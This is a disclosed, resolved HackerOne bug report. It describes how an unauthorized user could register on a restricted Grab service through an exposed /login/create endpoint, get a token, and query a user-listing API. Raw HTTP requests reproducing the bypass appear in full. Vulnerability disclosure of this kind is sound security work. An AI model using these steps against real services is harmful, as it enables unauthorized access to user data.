Registration enabled on ███grab.com

Disclosed: 2018-02-28 05:16:59 By grouptherapy To grab
Medium
Vulnerability Details
**Summary:** An attacker can register an account on the `█████████grab.com` service, and access information from the service **Description:** While logging in via Google accounts is prohibited, an attacker can register an account through the `/login/create` endpoint, as per the below request ``` POST /login/create HTTP/1.1 Host: █████grab.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://███grab.com/ Authorization: Bearer null Content-Type: application/json Content-Length: 61 Cookie: G_ENABLED_IDPS=google; G_AUTHUSER_H=0 Connection: close {"userid":"█████","password":"██████"} ``` This can then be used to log in via the `/login` endpoint ,as in the following request: ``` POST /login HTTP/1.1 Host: █████grab.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://█████grab.com/ Authorization: Bearer null Content-Type: application/json Content-Length: 61 Cookie: G_ENABLED_IDPS=google; G_AUTHUSER_H=0 Connection: close {"userid":"██████","password":"████"} ``` which returns a valid token. F265433 This token can be used to access some of the endpoints, such as `/api/find/users`, as in the following request: F265434 ## Impact An attacker can access information in the system such as registered users. The application appears to be newly developed, and as such little information is stored currently.
Actions
View on HackerOne
Report Stats
  • Report ID: 318099
  • State: Closed
  • Substate: resolved
  • Upvotes: 29
Share this report